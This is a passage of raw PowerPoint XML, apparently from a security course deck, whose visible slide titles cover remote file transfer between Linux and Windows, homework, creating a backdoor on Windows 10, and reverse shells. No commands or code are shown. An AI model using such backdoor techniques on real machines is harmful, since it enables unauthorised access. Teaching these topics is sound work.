Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink27.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image310.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00.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8.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5.xml"/><Relationship Id="rId1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image" Target="../media/image16.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink7.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image11.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5.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink8.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6.svg"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink3.xml"/><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customXml" Target="../ink/ink9.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101010 data lines to infinity">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2E2D0D23-F351-CA3C-DFFA-0951E15AAD86}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect l="21887" t="9091" r="10117"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668867" y="1678666"/>
            <a:ext cx="4088190" cy="2369093"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="480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a:xfrm>
            <a:off x="677335" y="4050831"/>
            <a:ext cx="4079721" cy="1096901"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>Remote File Acquisition</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="34" name="Straight Connector 3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2506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700"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7">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E5B3CB-0C46-5BFC-C965-C3B23702C669}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="10036847" y="3735279"/>
              <a:ext cx="4320" cy="5760"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="2" name="Ink 1">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DBE5B3CB-0C46-5BFC-C965-C3B23702C669}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId4"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="10027847" y="3726639"/>
                <a:ext cx="21960" cy="23400"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </mc:Fallback>
      </mc:AlternateContent>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="241664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11</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BD06D31-7CAC-5B43-D03B-877056D08B72}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="6499847" y="5989599"/>
              <a:ext cx="4320" cy="360"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="2" name="Ink 1">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FBD06D31-7CAC-5B43-D03B-877056D08B72}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId4"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="6490847" y="5980599"/>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CE866D0-3FE2-6B52-B626-F1397DA2AD3D}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="6641327" y="6123879"/>
              <a:ext cx="360" cy="360"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="6" name="Ink 5">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CCE866D0-3FE2-6B52-B626-F1397DA2AD3D}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId6"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="6632687" y="6115239"/>
                <a:ext cx="18000" cy="18000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </mc:Fallback>
      </mc:AlternateContent>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31161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Hands on keyboard and mouse">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9A6CCCE4-31A8-5F65-9EED-498D66247555}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:duotone>
              <a:prstClr val="black"/>
              <a:prstClr val="white"/>
            </a:duotone>
          </a:blip>
          <a:srcRect l="27230" r="4001" b="-2"/>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4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="668866" y="1678666"/>
            <a:ext cx="5123515" cy="2369093"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4800"/>
              <a:t>Your work</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="23" name="Straight Connector 2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lide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8590663" y="6041362"/>
            <a:ext cx="683339" cy="365125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="914400">
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:fld id="{E24DD715-7292-4FAD-A484-09D5D92FAB07}" type="slidenum">
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr defTabSz="914400">
                <a:spcAft>
                  <a:spcPts val="600"/>
                </a:spcAft>
              </a:pPr>
              <a:t>12</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>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379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86933" y="609600"/>
            <a:ext cx="10197494" cy="1099457"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Goal</a:t>
            </a:r>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Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{07F06D97-06B1-8242-F80E-71A668491908}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="288193656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00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24DD715-7292-4FAD-A484-09D5D92FAB07}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>15</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3BF08B5-58DD-CB09-FD46-A825C6314B9A}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="6202127" y="6060519"/>
              <a:ext cx="1440" cy="360"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="2" name="Ink 1">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{63BF08B5-58DD-CB09-FD46-A825C6314B9A}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId4"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="6193127" y="6051519"/>
                <a:ext cx="19080" cy="18000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </mc:Fallback>
      </mc:AlternateContent>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="242758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24DD715-7292-4FAD-A484-09D5D92FAB07}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>16</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
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2E051C2F-9025-48D3-8554-B0E0E3B004AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7169124" y="2135515"/>
            <a:ext cx="4623638" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This slide: send a file from Linux to Win</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Your homework is: sent a file from Win to Linux</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DFF498D-D4F3-23C4-B8E5-384CCA35164D}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="10901567" y="1395999"/>
              <a:ext cx="360" cy="360"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="4" name="Ink 3">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EDFF498D-D4F3-23C4-B8E5-384CCA35164D}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId5"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="10892567" y="1387359"/>
                <a:ext cx="18000" cy="18000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </mc:Fallback>
      </mc:AlternateContent>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15622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8" name="Straight Connector 27">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32" name="Isosceles Triangle 31">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p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="829734" y="854529"/>
            <a:ext cx="5799665" cy="5148943"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="6000"/>
              <a:t>Create a backdoor at Window 10/Remote File Acquisition</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9603035" y="5946112"/>
            <a:ext cx="683339" cy="365125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:fld id="{E24DD715-7292-4FAD-A484-09D5D92FAB07}" type="slidenum">
              <a:rPr lang="en-US" kern="1200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:pPr>
                <a:spcAft>
                  <a:spcPts val="600"/>
                </a:spcAft>
              </a:pPr>
              <a:t>17</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" kern="1200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>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6C1D5EF-A478-2D77-CFC4-CB7513BD80CE}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="5897369" y="1658403"/>
              <a:ext cx="360" cy="360"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="2" name="Ink 1">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{96C1D5EF-A478-2D77-CFC4-CB7513BD80CE}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId3"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="5888369" y="1649763"/>
                <a:ext cx="18000" cy="18000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </mc:Fallback>
      </mc:AlternateContent>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="103559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5B91847-4ACB-D04A-3B3A-37F13EEDEA78}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="10986207" y="2048722"/>
              <a:ext cx="360" cy="360"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="2" name="Ink 1">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{95B91847-4ACB-D04A-3B3A-37F13EEDEA78}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId7"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="10977567" y="2039722"/>
                <a:ext cx="18000" cy="18000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </mc:Fallback>
      </mc:AlternateContent>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="198438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D4BDF-0DE5-09BD-9D84-5B31B3A1A165}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1286933" y="609600"/>
            <a:ext cx="10197494" cy="1099457"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Outline</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28C48D4-C650-EA24-ED01-6D99CDEDF638}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="1"/>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="335825532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4836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occurs,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3E7A8F8-8CEA-7F30-B0EF-A79C5B5E1DAC}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="4451087" y="4734999"/>
              <a:ext cx="1440" cy="360"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="3" name="Ink 2">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{43E7A8F8-8CEA-7F30-B0EF-A79C5B5E1DAC}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId5"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="4442447" y="4725999"/>
                <a:ext cx="19080" cy="18000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </mc:Fallback>
      </mc:AlternateContent>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="331837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Subtitle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1507067" y="4050833"/>
            <a:ext cx="7766936" cy="1096899"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>A new type of backdoor</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1507067" y="1397000"/>
            <a:ext cx="7766936" cy="2653836"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="5400"/>
              <a:t>Reverse Shell</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10402529" y="6041362"/>
            <a:ext cx="683339" cy="365125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:fld id="{00000000-1234-1234-1234-123412341234}" type="slidenum">
              <a:rPr lang="en-US" kern="1200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:pPr>
                <a:spcAft>
                  <a:spcPts val="600"/>
                </a:spcAft>
              </a:pPr>
              <a:t>21</a:t>
            </a:fld>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212512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743F91A7-6CB8-DB6A-2DDD-A6B0E1D0F328}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5935980" y="2324100"/>
            <a:ext cx="502920" cy="25222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5810B019-E431-AF3A-5D0A-AB6946B1AA80}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5105400" y="2720340"/>
            <a:ext cx="5516880" cy="212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85E6CB-A996-659F-CCDB-CEA43CE67FF1}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="10490917" y="3355162"/>
              <a:ext cx="4320" cy="4680"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="2" name="Ink 1">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DB85E6CB-A996-659F-CCDB-CEA43CE67FF1}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId4"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="10482277" y="3346162"/>
                <a:ext cx="21960" cy="22320"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </mc:Fallback>
      </mc:AlternateContent>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19898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23</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4" name="Straight Connector 23">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5" y="1282701"/>
            <a:ext cx="5096060" cy="4307148"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="5400"/>
              <a:t>Reverse shell definition</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="Freeform: Shape 31">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p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7821120" y="2510119"/>
            <a:ext cx="3602567" cy="1829292"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr">
